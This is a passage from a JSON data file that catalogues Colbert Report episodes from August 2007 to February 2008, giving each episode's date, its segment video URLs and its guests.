        "http://thecolbertreport.cc.com/videos/jtqjr6/jim-cramer",
        "http://thecolbertreport.cc.com/videos/nveh3o/bears---balls---bootlegging",
        "http://thecolbertreport.cc.com/videos/7zavlx/tina-brown"
      ],
      "guest": "Jim Cramer, Tina Brown"
    },
    {
      "date": "2007-08-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hutdl7/intro---8-9-07",
        "http://thecolbertreport.cc.com/videos/3abho5/the-word---clarity",
        "http://thecolbertreport.cc.com/videos/qp6xha/tip-wag---bloomberg",
        "http://thecolbertreport.cc.com/videos/h9y997/judd-apatow",
        "http://thecolbertreport.cc.com/videos/161mvg/sign-off---toenails"
      ],
      "guest": "Judd Apatow"
    },
    {
      "date": "2007-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1833p0/intro---8-13-07",
        "http://thecolbertreport.cc.com/videos/gavjew/rove-resigns",
        "http://thecolbertreport.cc.com/videos/qu995y/the-word---white-guy",
        "http://thecolbertreport.cc.com/videos/bruhc9/threatdown---bats",
        "http://thecolbertreport.cc.com/videos/fk3k31/michael-jacobson",
        "http://thecolbertreport.cc.com/videos/dnjitq/sign-off---americone-dream"
      ],
      "guest": "Michael Jacobson"
    },
    {
      "date": "2007-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0imzs4/dna--could-it-happen-to-you----jackknife",
        "http://thecolbertreport.cc.com/videos/n35y17/jerry-miller",
        "http://thecolbertreport.cc.com/videos/5o7ie1/dr--spencer-wells",
        "http://thecolbertreport.cc.com/videos/x03vyw/dna--could-it-happen-to-you----incrimination"
      ],
      "guest": "Jerry Miller, Spencer Wells"
    },
    {
      "date": "2007-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6o4ihx/intro---8-15-07",
        "http://thecolbertreport.cc.com/videos/rv9k9s/jewish-colbert-ancestry",
        "http://thecolbertreport.cc.com/videos/3zlayh/markos-moulitsas",
        "http://thecolbertreport.cc.com/videos/6mvd9x/monkey-on-the-lam---oliver",
        "http://thecolbertreport.cc.com/videos/zp4iw7/the-word---potential",
        "http://thecolbertreport.cc.com/videos/734nxn/michael-wallis",
        "http://thecolbertreport.cc.com/videos/z4d4y4/sign-off---doctor-s-orders"
      ],
      "guest": "Michael Wallis"
    },
    {
      "date": "2007-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ns0g26/intro---8-16-07",
        "http://thecolbertreport.cc.com/videos/14jprr/colbert-branson-trainwreck",
        "http://thecolbertreport.cc.com/videos/kgguey/mike-huckabee",
        "http://thecolbertreport.cc.com/videos/fnrvrc/cheating-death---gene-therapy",
        "http://thecolbertreport.cc.com/videos/u8nc37/andrew-keen"
      ],
      "guest": "Andrew Keen"
    },
    {
      "date": "2007-08-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tfnhsy/intro---8-20-07",
        "http://thecolbertreport.cc.com/videos/xo98yh/wriststrong-bracelets",
        "http://thecolbertreport.cc.com/videos/us6itk/the-word---made-in-iraq",
        "http://thecolbertreport.cc.com/videos/9a8i9h/nailed--em---northern-border",
        "http://thecolbertreport.cc.com/videos/o9ho2y/nathan-sawaya"
      ],
      "guest": "Nathan Sawaya"
    },
    {
      "date": "2007-08-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2gjr3w/intro---8-21-07",
        "http://thecolbertreport.cc.com/videos/bcfeni/smokin--pole---global-warming",
        "http://thecolbertreport.cc.com/videos/7gfsui/the-word---self-determination",
        "http://thecolbertreport.cc.com/videos/v4twhy/formidable-opponent---terrorism",
        "http://thecolbertreport.cc.com/videos/4o129i/michael-shermer"
      ],
      "guest": "Michael Shermer"
    },
    {
      "date": "2007-08-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v8cwuz/intro---8-22-07",
        "http://thecolbertreport.cc.com/videos/k7oqos/foreshadowing",
        "http://thecolbertreport.cc.com/videos/9snnh5/the-word---november-surprise",
        "http://thecolbertreport.cc.com/videos/ymi1da/where-in-the-world-is-matt-lauer-s-wriststrong-bracelet-",
        "http://thecolbertreport.cc.com/videos/r18bn4/colbert-platinum---san-tropez",
        "http://thecolbertreport.cc.com/videos/xxwsh0/richard-branson",
        "http://thecolbertreport.cc.com/videos/eb410v/doused"
      ],
      "guest": "Richard Branson"
    },
    {
      "date": "2007-08-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w3z5w0/intro---8-23-07",
        "http://thecolbertreport.cc.com/videos/uc4umy/cheney-s-pre-emptive-strike",
        "http://thecolbertreport.cc.com/videos/en1mx1/thomas-ricks",
        "http://thecolbertreport.cc.com/videos/xjgukn/fractured-freedom",
        "http://thecolbertreport.cc.com/videos/0arcqm/wrist-cast-signatories",
        "http://thecolbertreport.cc.com/videos/3xfbbo/free-at-last",
        "http://thecolbertreport.cc.com/videos/qta5f5/the-auction-begins-"
      ],
      "guest": "Thomas Ricks"
    },
    {
      "date": "2007-09-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/844a7k/intro---9-10-07",
        "http://thecolbertreport.cc.com/videos/vdvpmz/kicking-the-habit",
        "http://thecolbertreport.cc.com/videos/p14g3t/the-word---honor-bound",
        "http://thecolbertreport.cc.com/videos/2qi5qf/cast-auction",
        "http://thecolbertreport.cc.com/videos/u1yamr/bjorn-lomborg"
      ],
      "guest": "Bjorn Lomborg"
    },
    {
      "date": "2007-09-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hy8je4/intro---9-11-07",
        "http://thecolbertreport.cc.com/videos/3l7k3j/general-betray-us",
        "http://thecolbertreport.cc.com/videos/5yaj4x/indecision-2008--don-t-f--k-this-up-america---the-kickoff",
        "http://thecolbertreport.cc.com/videos/mjzhz2/the-word---southsourcing",
        "http://thecolbertreport.cc.com/videos/5z4esb/katie-bruggeman---exclusive",
        "http://thecolbertreport.cc.com/videos/o07u14/garrison-keillor"
      ],
      "guest": "Garrison Keillor"
    },
    {
      "date": "2007-09-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h5njj1/intro---9-12-07",
        "http://thecolbertreport.cc.com/videos/8lpy3i/1-888-mops-key",
        "http://thecolbertreport.cc.com/videos/7hc8lx/the-word---re-run",
        "http://thecolbertreport.cc.com/videos/r6x2pm/michael-bloomberg",
        "http://thecolbertreport.cc.com/videos/3rano7/tek-jansen---beginning-s-first-dawn--episode-one",
        "http://thecolbertreport.cc.com/videos/n46uq9/joel-klein",
        "http://thecolbertreport.cc.com/videos/pc4v8w/klein-s-penance"
      ],
      "guest": "Joel Klein"
    },
    {
      "date": "2007-09-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tduyob/intro---9-13-07",
        "http://thecolbertreport.cc.com/videos/rvio16/the-emmys",
        "http://thecolbertreport.cc.com/videos/g1gps7/father-james-martin",
        "http://thecolbertreport.cc.com/videos/9unkmu/wriststrong",
        "http://thecolbertreport.cc.com/videos/5c8kig/ed-begley-jr-",
        "http://thecolbertreport.cc.com/videos/9mwknn/stephen-for-president---answering-the-call"
      ],
      "guest": "Ed Begley Jr."
    },
    {
      "date": "2007-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tr81w4/intro---9-18-07",
        "http://thecolbertreport.cc.com/videos/6l9i7j/the-word---let-my-people-go",
        "http://thecolbertreport.cc.com/videos/6we8r4/difference-makers---nitro-girl",
        "http://thecolbertreport.cc.com/videos/jx6a68/susan-sarandon"
      ],
      "guest": "Susan Sarandon"
    },
    {
      "date": "2007-09-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lv4fuw/intro---9-19-07",
        "http://thecolbertreport.cc.com/videos/zeoen2/ed-asner-dials-the-atone-phone",
        "http://thecolbertreport.cc.com/videos/0aau1u/the-word---solitarity",
        "http://thecolbertreport.cc.com/videos/7ooxuh/colbert-platinum---green-edition",
        "http://thecolbertreport.cc.com/videos/nnhbey/naomi-wolf"
      ],
      "guest": "Naomi Wolf"
    },
    {
      "date": "2007-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fojlm8/intro---9-20-07",
        "http://thecolbertreport.cc.com/videos/0ek76n/rabbi-fish",
        "http://thecolbertreport.cc.com/videos/2h18lo/blistering-rebuttal",
        "http://thecolbertreport.cc.com/videos/z6i9oa/the-word---market-forces",
        "http://thecolbertreport.cc.com/videos/b5qfpk/threatdown---us",
        "http://thecolbertreport.cc.com/videos/wthvm9/jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/1pktzf/craziest-f--king-thing-i-ve-ever-heard---mayo-kitchen"
      ],
      "guest": "Jeffrey Toobin"
    },
    {
      "date": "2007-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tgxkym/intro---9-24-07",
        "http://thecolbertreport.cc.com/videos/kwfydk/the-word---na-na-na-na-na-na",
        "http://thecolbertreport.cc.com/videos/zztck4/alpha-dog-of-the-week---honniball",
        "http://thecolbertreport.cc.com/videos/l00qbc/the-metric-system",
        "http://thecolbertreport.cc.com/videos/pkz7i5/thomas-l--friedman",
        "http://thecolbertreport.cc.com/videos/emtni3/sign-off---stephen-accepts-your-apologies"
      ],
      "guest": "Thomas Friedman"
    },
    {
      "date": "2007-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yrize5/intro---9-25-07",
        "http://thecolbertreport.cc.com/videos/cminr7/no-nuclear-iran",
        "http://thecolbertreport.cc.com/videos/2g01er/indecision-2008--don-t-f--k-this-up-america---giuliani",
        "http://thecolbertreport.cc.com/videos/bjhu7f/k--david-harrison",
        "http://thecolbertreport.cc.com/videos/b5cc0e/tip-wag---muslim-hipsters",
        "http://thecolbertreport.cc.com/videos/5ny4ja/john-grisham"
      ],
      "guest": "John Grisham"
    },
    {
      "date": "2007-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ups73z/intro---9-26-07",
        "http://thecolbertreport.cc.com/videos/rn3hke/forgiving-bennett",
        "http://thecolbertreport.cc.com/videos/agyblq/canadian-dollar",
        "http://thecolbertreport.cc.com/videos/nj93xu/the-word---a-word-from-our-sponsors",
        "http://thecolbertreport.cc.com/videos/0iswbv/sam-waterston",
        "http://thecolbertreport.cc.com/videos/79m504/tony-bennett"
      ],
      "guest": "Tony Bennett"
    },
    {
      "date": "2007-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i67egh/intro---9-27-07",
        "http://thecolbertreport.cc.com/videos/o502gv/king-tut",
        "http://thecolbertreport.cc.com/videos/mhmga5/democratic-presidential-debate---the-clintons",
        "http://thecolbertreport.cc.com/videos/th2rny/the-word---early-immunization",
        "http://thecolbertreport.cc.com/videos/ev9qqd/david-schwartz",
        "http://thecolbertreport.cc.com/videos/q0vng8/sign-off---bear-in-the-woods"
      ],
      "guest": "David Schwartz"
    },
    {
      "date": "2007-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4vmpg2/intro---10-1-07",
        "http://thecolbertreport.cc.com/videos/s3koea/on-notice---dennis-kucinich",
        "http://thecolbertreport.cc.com/videos/e5dl9b/the-word---evitable",
        "http://thecolbertreport.cc.com/videos/7s7h6l/cheating-death---sleep",
        "http://thecolbertreport.cc.com/videos/5wkeol/charlie-savage",
        "http://thecolbertreport.cc.com/videos/g86mf6/sign-off---all-night-date"
      ],
      "guest": "Charlie Savage"
    },
    {
      "date": "2007-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5ycsxc/intro---10-2-07",
        "http://thecolbertreport.cc.com/videos/ws1a9l/end-of-the-universe",
        "http://thecolbertreport.cc.com/videos/boxkhr/the-real-showdown",
        "http://thecolbertreport.cc.com/videos/f1ovth/the-word---troops-out-now",
        "http://thecolbertreport.cc.com/videos/berne3/nailed--em---cyberrorists",
        "http://thecolbertreport.cc.com/videos/non4mf/john-mearsheimer",
        "http://thecolbertreport.cc.com/videos/yxngw7/what-number-is-stephen-thinking-of----between-one-and-ten"
      ],
      "guest": "John Mearsheimer"
    },
    {
      "date": "2007-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/77zwpl/intro---10-3-07",
        "http://thecolbertreport.cc.com/videos/rsugzz/krugman-correction",
        "http://thecolbertreport.cc.com/videos/ujxs1h/gay-roundup---dan-savage",
        "http://thecolbertreport.cc.com/videos/ttvyxm/alpha-dog-of-the-week---president-bush",
        "http://thecolbertreport.cc.com/videos/bohex1/monkey-on-the-lam---missouri",
        "http://thecolbertreport.cc.com/videos/1scf3a/jim-lovell"
      ],
      "guest": "Jim Lovell"
    },
    {
      "date": "2007-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6takag/intro---10-4-07",
        "http://thecolbertreport.cc.com/videos/9ie5cp/fred-thompson-s-lackluster-candidacy",
        "http://thecolbertreport.cc.com/videos/t9j9vd/the-word---catastrophe",
        "http://thecolbertreport.cc.com/videos/ze1fvk/threatdown---science-and-technology-edition",
        "http://thecolbertreport.cc.com/videos/i58e8l/john-kao",
        "http://thecolbertreport.cc.com/videos/jy5aw2/an--i-am-america--and-so-can-you----success-story"
      ],
      "guest": "John Kao"
    },
    {
      "date": "2007-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zjbyqa/intro---10-8-07",
        "http://thecolbertreport.cc.com/videos/pw4m4c/doggie-co-author",
        "http://thecolbertreport.cc.com/videos/xkdwvy/the-word---medium-matters",
        "http://thecolbertreport.cc.com/videos/56gzq7/balls-for-kidz---schip",
        "http://thecolbertreport.cc.com/videos/og377e/george-saunders",
        "http://thecolbertreport.cc.com/videos/p6057q/sign-off---i-am-america--and-so-can-you---day"
      ],
      "guest": "George Saunders"
    },
    {
      "date": "2007-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q3jijk/intro---10-9-07",
        "http://thecolbertreport.cc.com/videos/plzp6y/i-am-america-on-sale-now-",
        "http://thecolbertreport.cc.com/videos/ubbze1/new-reagan-coin",
        "http://thecolbertreport.cc.com/videos/597azm/the-word---mighty-duck",
        "http://thecolbertreport.cc.com/videos/1znjlb/obama-s-lapel",
        "http://thecolbertreport.cc.com/videos/x1wzb3/the-stephen-colbert-interview",
        "http://thecolbertreport.cc.com/videos/r0xdzt/sign-off---lead-free-ink"
      ],
      "guest": "Stephen Colbert"
    },
    {
      "date": "2007-10-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vsm7hv/intro---10-10-07",
        "http://thecolbertreport.cc.com/videos/4ht7gm/dead-to-me---pocketmaster",
        "http://thecolbertreport.cc.com/videos/79ara8/the-word---americon-dream",
        "http://thecolbertreport.cc.com/videos/dzvdm0/tip-wag---bruce-springsteen",
        "http://thecolbertreport.cc.com/videos/97z30b/wesley-clark"
      ],
      "guest": "Gen. Wesley Clark"
    },
    {
      "date": "2007-10-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sprkvb/intro---10-11-07",
        "http://thecolbertreport.cc.com/videos/a27soa/black-haired-guy-who-isn-t-steve-doocy",
        "http://thecolbertreport.cc.com/videos/o6xiyi/frank-gaffney",
        "http://thecolbertreport.cc.com/videos/zipx3v/colbert-platinum---kidz-edition",
        "http://thecolbertreport.cc.com/videos/zv1po1/chris-jordan"
      ],
      "guest": "Chris Jordan"
    },
    {
      "date": "2007-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/56sadv/intro---10-15-07",
        "http://thecolbertreport.cc.com/videos/9esznw/who-s-honoring-me-now----marie-claire",
        "http://thecolbertreport.cc.com/videos/oogvcb/the-word---enviro-medal-disaster",
        "http://thecolbertreport.cc.com/videos/cmpb1d/kucinich-s-pockets",
        "http://thecolbertreport.cc.com/videos/biff8k/paul-glastris"
      ],
      "guest": "Dennis Kucinich, Paul Glastris"
    },
    {
      "date": "2007-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6k009y/intro---10-16-07",
        "http://thecolbertreport.cc.com/videos/0pl61p/planet-in-peril",
        "http://thecolbertreport.cc.com/videos/f97ynd/indecision-2008--don-t-f--k-this-up-america---presidential-bid",
        "http://thecolbertreport.cc.com/videos/9phoww/jeff-greenfield",
        "http://thecolbertreport.cc.com/videos/9j5u2v/bob-drogin"
      ],
      "guest": "Bob Drogin, Jeff Greenfield"
    },
    {
      "date": "2007-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e6jgx6/intro---10-17-07",
        "http://thecolbertreport.cc.com/videos/el4ceo/the-big-news",
        "http://thecolbertreport.cc.com/videos/ps9172/hail-to-the-cheese---filing-papers",
        "http://thecolbertreport.cc.com/videos/duz61o/threatdown---anniversary",
        "http://thecolbertreport.cc.com/videos/dvoers/garry-kasparov",
        "http://thecolbertreport.cc.com/videos/e0223g/sign-off---revenge-is-sweet"
      ],
      "guest": "Garry Kasparov"
    },
    {
      "date": "2007-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i4a6fg/intro---10-18-07",
        "http://thecolbertreport.cc.com/videos/z3kzwl/pumpkin-shortage",
        "http://thecolbertreport.cc.com/videos/6o9coa/global-scrunching---anderson-cooper",
        "http://thecolbertreport.cc.com/videos/p1wo65/hail-to-the-cheese---campaign-coverage-finance",
        "http://thecolbertreport.cc.com/videos/rcmqef/craig-newmark",
        "http://thecolbertreport.cc.com/videos/i2rw4t/sign-off---portrait-unveiled"
      ],
      "guest": "Craig Newmark, Anderson Cooper"
    },
    {
      "date": "2007-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3xfeo5/intro---10-29-07",
        "http://thecolbertreport.cc.com/videos/oqlp6f/the-last-infographic",
        "http://thecolbertreport.cc.com/videos/2hfe9b/hail-to-the-cheese---branded-killings",
        "http://thecolbertreport.cc.com/videos/wli1tg/the-word---absinthetinence",
        "http://thecolbertreport.cc.com/videos/49my1v/tip-wag---sleep-deprivation",
        "http://thecolbertreport.cc.com/videos/pmtsjp/richard-berman",
        "http://thecolbertreport.cc.com/videos/1yeaa0/sign-off---rocktober"
      ],
      "guest": "Richard Berman"
    },
    {
      "date": "2007-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6130g5/intro---10-30-07",
        "http://thecolbertreport.cc.com/videos/f3dddn/massie-ritsch",
        "http://thecolbertreport.cc.com/videos/rrhz2o/earth-attacks---georgia-drought",
        "http://thecolbertreport.cc.com/videos/czdur4/j--craig-venter"
      ],
      "guest": "Massie Ritsch, Craig Venter"
    },
    {
      "date": "2007-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fjrl1d/intro---10-31-07",
        "http://thecolbertreport.cc.com/videos/iwuly8/hallo-weening",
        "http://thecolbertreport.cc.com/videos/lshob0/democra-see--democra-do---elections",
        "http://thecolbertreport.cc.com/videos/pcplr6/the-word---job-description",
        "http://thecolbertreport.cc.com/videos/hpr411/obama-s-grit-off-challenge",
        "http://thecolbertreport.cc.com/videos/s7cadq/monkey-on-the-lam---lobster-edition",
        "http://thecolbertreport.cc.com/videos/4uxxf3/lawrence-wilkerson"
      ],
      "guest": "Col. Lawrence Wilkerson"
    },
    {
      "date": "2007-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/we8h5v/intro---11-1-07",
        "http://thecolbertreport.cc.com/videos/dzscg7/hail-to-the-cheese---ballot-issues",
        "http://thecolbertreport.cc.com/videos/9d4e78/hail-to-the-cheese---democratic-executive-council",
        "http://thecolbertreport.cc.com/videos/tcxqui/walter-kirn",
        "http://thecolbertreport.cc.com/videos/zymn63/hail-to-the-cheese---donors-choose"
      ],
      "guest": "Walter Kirn"
    }
  ],
  "2008": [
    {
      "date": "2008-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3q3gby/intro---1-7-08",
        "http://thecolbertreport.cc.com/videos/cva2to/applause",
        "http://thecolbertreport.cc.com/videos/mdmdd0/nothing-in-the-prompters",
        "http://thecolbertreport.cc.com/videos/lp7qsd/2008-election",
        "http://thecolbertreport.cc.com/videos/ku5oni/the-word--------",
        "http://thecolbertreport.cc.com/videos/mbip8q/democratic-change---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/v60qiq/richard-freeman",
        "http://thecolbertreport.cc.com/videos/ckwp47/first-wrap-up"
      ],
      "guest": "Andrew Sullivan, Richard Freeman"
    },
    {
      "date": "2008-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ws9bh/self-driving-car",
        "http://thecolbertreport.cc.com/videos/2785cy/bush-absolutely-optimistic",
        "http://thecolbertreport.cc.com/videos/2hhoxp/meteorite-market",
        "http://thecolbertreport.cc.com/videos/ljxmh2/chris-beam",
        "http://thecolbertreport.cc.com/videos/tl8ofm/gary-rosen",
        "http://thecolbertreport.cc.com/videos/m7kpci/note-to-strikers"
      ],
      "guest": "Chris Beam, Gary Rosen"
    },
    {
      "date": "2008-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/33bwbo/she-won-",
        "http://thecolbertreport.cc.com/videos/fu1w6p/new-hampshire-wrap-up",
        "http://thecolbertreport.cc.com/videos/weeodm/mike-huckabee",
        "http://thecolbertreport.cc.com/videos/d0g8tk/matt-taibbi",
        "http://thecolbertreport.cc.com/videos/je02b9/studio-on-fire"
      ],
      "guest": "Gov. Mike Huckabee, Matt Taibbi"
    },
    {
      "date": "2008-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/613lgd/un-american-news---primaries",
        "http://thecolbertreport.cc.com/videos/s269t4/norman-ornstein",
        "http://thecolbertreport.cc.com/videos/y7lisr/national-treasure-pt--1",
        "http://thecolbertreport.cc.com/videos/x10j2p/muhammad-yunus",
        "http://thecolbertreport.cc.com/videos/ypiss3/to-the-writers"
      ],
      "guest": "Norman Ornstein, Muhammad Yunus"
    },
    {
      "date": "2008-01-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pm5v1p/papa-bear-takes-note",
        "http://thecolbertreport.cc.com/videos/1vwzy6/around-the-world-in-11-6-seconds---lo-mein",
        "http://thecolbertreport.cc.com/videos/7k6fkq/indecision-2008--don-t-f--k-this-up-america---trustworthy-manner",
        "http://thecolbertreport.cc.com/videos/dytre7/national-treasure-pt--2",
        "http://thecolbertreport.cc.com/videos/xgsf42/neil-shubin",
        "http://thecolbertreport.cc.com/videos/tmke9w/digesting-lo-mein"
      ],
      "guest": "Neil Shubin"
    },
    {
      "date": "2008-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4wimo2/who-s-riding-my-coattails-now----vince-vaughn",
        "http://thecolbertreport.cc.com/videos/hrzpve/peter-hopkins",
        "http://thecolbertreport.cc.com/videos/1m3t4h/national-treasure-pt--3",
        "http://thecolbertreport.cc.com/videos/b0e6w3/jared-cohen",
        "http://thecolbertreport.cc.com/videos/4f2fw9/parting-shot"
      ],
      "guest": "Peter Hopkins, Jared Cohen"
    },
    {
      "date": "2008-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6mjra2/primary-update",
        "http://thecolbertreport.cc.com/videos/ng3cbb/political-roulette-pt--1",
        "http://thecolbertreport.cc.com/videos/v0glj4/back-off-mike-huckabee",
        "http://thecolbertreport.cc.com/videos/zlpayq/deborah-tannen"
      ],
      "guest": "Deborah Tannen"
    },
    {
      "date": "2008-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0tl5ul/push-polling",
        "http://thecolbertreport.cc.com/videos/phko2g/political-roulette-pt--2",
        "http://thecolbertreport.cc.com/videos/xj86rv/lou-dobbs",
        "http://thecolbertreport.cc.com/videos/ykpl7i/david-levy"
      ],
      "guest": "Lou Dobbs, David Levy"
    },
    {
      "date": "2008-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3xkco0/nevada-caucus",
        "http://thecolbertreport.cc.com/videos/qznknb/huckabee-s-message",
        "http://thecolbertreport.cc.com/videos/i2josd/allan-sloan",
        "http://thecolbertreport.cc.com/videos/wjtmux/better-know-a-governor---mark-sanford",
        "http://thecolbertreport.cc.com/videos/ia8xzl/eric-weiner"
      ],
      "guest": "Allan Sloan, Eric Weiner"
    },
    {
      "date": "2008-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8q1hh4/dow-drop",
        "http://thecolbertreport.cc.com/videos/7cp97e/malcolm-gladwell",
        "http://thecolbertreport.cc.com/videos/xw3v9i/andrew-young",
        "http://thecolbertreport.cc.com/videos/5tvl4o/let-my-people-go"
      ],
      "guest": "Malcolm Gladwell, Andrew Young"
    },
    {
      "date": "2008-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1vjtzq/fred-thompson-out",
        "http://thecolbertreport.cc.com/videos/1fbgf9/sport-report---tom-brady-s-injury",
        "http://thecolbertreport.cc.com/videos/08lghg/big-check",
        "http://thecolbertreport.cc.com/videos/wmftq8/jeb-corliss",
        "http://thecolbertreport.cc.com/videos/rp759h/andrew-mclean"
      ],
      "guest": "Marie Wood, Jeb Corliss, Andrew McLean"
    },
    {
      "date": "2008-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7uwyyh/rudy-in-florida",
        "http://thecolbertreport.cc.com/videos/xoh710/clinton-s-hero",
        "http://thecolbertreport.cc.com/videos/swzg9r/debra-dickerson",
        "http://thecolbertreport.cc.com/videos/0wz55a/south-carolina-debate",
        "http://thecolbertreport.cc.com/videos/bpcnyw/charles-nesson"
      ],
      "guest": "Debra Dickerson, Charles Nesson"
    },
    {
      "date": "2008-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/na6amv/obama-just-like-jfk",
        "http://thecolbertreport.cc.com/videos/zvtkxx/gordon-b--hinckley-died",
        "http://thecolbertreport.cc.com/videos/07hrs5/marjane-satrapi",
        "http://thecolbertreport.cc.com/videos/wrdlsf/south-carolina---what-could-have-been-",
        "http://thecolbertreport.cc.com/videos/l1477t/rick-warren"
      ],
      "guest": "Marjane Satrapi, Rick Warren"
    },
    {
      "date": "2008-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aeooxe/googley-eyed-clams",
        "http://thecolbertreport.cc.com/videos/laposi/joe-quesada",
        "http://thecolbertreport.cc.com/videos/xw6ugs/french-clam",
        "http://thecolbertreport.cc.com/videos/38i4eg/alex-ross"
      ],
      "guest": "Joe Quesada, Alex Ross"
    },
    {
      "date": "2008-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/akx9de/exclusive---better-know-a-district---south-carolina-s-4th---bob-inglis",
        "http://thecolbertreport.cc.com/videos/t6sflk/florida-primary",
        "http://thecolbertreport.cc.com/videos/vb4t2x/carl-hiaasen",
        "http://thecolbertreport.cc.com/videos/n87g1n/better-know-a-district---south-carolina-s-4th---bob-inglis",
        "http://thecolbertreport.cc.com/videos/m4iax5/frans-de-waal"
      ],
      "guest": "Carl Hiaasen, Frans de Waal"
    },
    {
      "date": "2008-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z0raub/timetables",
        "http://thecolbertreport.cc.com/videos/8l0ndt/ron-paul-sounds-alarm",
        "http://thecolbertreport.cc.com/videos/2lwxda/tim-harford",
        "http://thecolbertreport.cc.com/videos/0d4uq9/people-who-are-destroying-america---pick-up-trucks",
        "http://thecolbertreport.cc.com/videos/kgrty6/andrew-napolitano"
      ],
      "guest": "Tim Harford, Andrew Napolitano"
    },
    {
      "date": "2008-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pwg4p2/conan-and-jon",
        "http://thecolbertreport.cc.com/videos/y5zzyu/tony-campolo",
        "http://thecolbertreport.cc.com/videos/tmuhtk/jacob-weisberg",
        "http://thecolbertreport.cc.com/videos/7r0nt2/post-show-ass-kicking"
      ],
      "guest": "Tony Campolo, Jacob Weisberg"
    },
    {
      "date": "2008-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yvxknz/happy-super-tuesday-",
        "http://thecolbertreport.cc.com/videos/nqwcui/hillary-is-a-target",
        "http://thecolbertreport.cc.com/videos/xonm3y/angelo-falcon",
        "http://thecolbertreport.cc.com/videos/xq9nc4/mukasey-on-torture",
        "http://thecolbertreport.cc.com/videos/gjwjsl/bob-dole"
      ],
      "guest": "Angelo Falcon, Bob Dole"
    },
    {
      "date": "2008-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j3dp2u/late-night-fight",
        "http://thecolbertreport.cc.com/videos/gqstf6/clap-clap-point-point",
        "http://thecolbertreport.cc.com/videos/yxx0w5/richard-brookhiser",
        "http://thecolbertreport.cc.com/videos/ammxmv/better-know-a-lobby---human-rights-campaign-pt--1",
        "http://thecolbertreport.cc.com/videos/nhkpwj/tad-devine"
      ],
      "guest": "Tad Devine"
    },
    {
      "date": "2008-02-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ctzo98/stephen-s-ethnic-minute",
        "http://thecolbertreport.cc.com/videos/v43el0/huckabee-s-still-in",
        "http://thecolbertreport.cc.com/videos/negp2q/better-know-a-lobby---human-rights-campaign-pt--2",
        "http://thecolbertreport.cc.com/videos/oxf63b/mark-moffett"
      ],
      "guest": "Mark Moffett"
    },
    {
      "date": "2008-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bs8egm/obama-wins-a-grammy",
        "http://thecolbertreport.cc.com/videos/lnkbna/goodbye-mitt",
        "http://thecolbertreport.cc.com/videos/myptag/aubrey-de-grey",
        "http://thecolbertreport.cc.com/videos/in3tg3/portrait-check-in",
        "http://thecolbertreport.cc.com/videos/8sjpoa/philip-zimbardo"
      ],
      "guest": "Aubrey de Grey, Philip Zimbardo"
    },
    {
      "date": "2008-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gucgvs/huckabee-s-obligation",
        "http://thecolbertreport.cc.com/videos/6g98j7/eliot-spitzer",
        "http://thecolbertreport.cc.com/videos/udbv19/eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/ekpicq/lisa-randall"
      ],
      "guest": "Gov. Eliot Spitzer, Eleanor Holmes Norton, Lisa Randall"
    },
    {
      "date": "2008-02-13",
      "videos": [
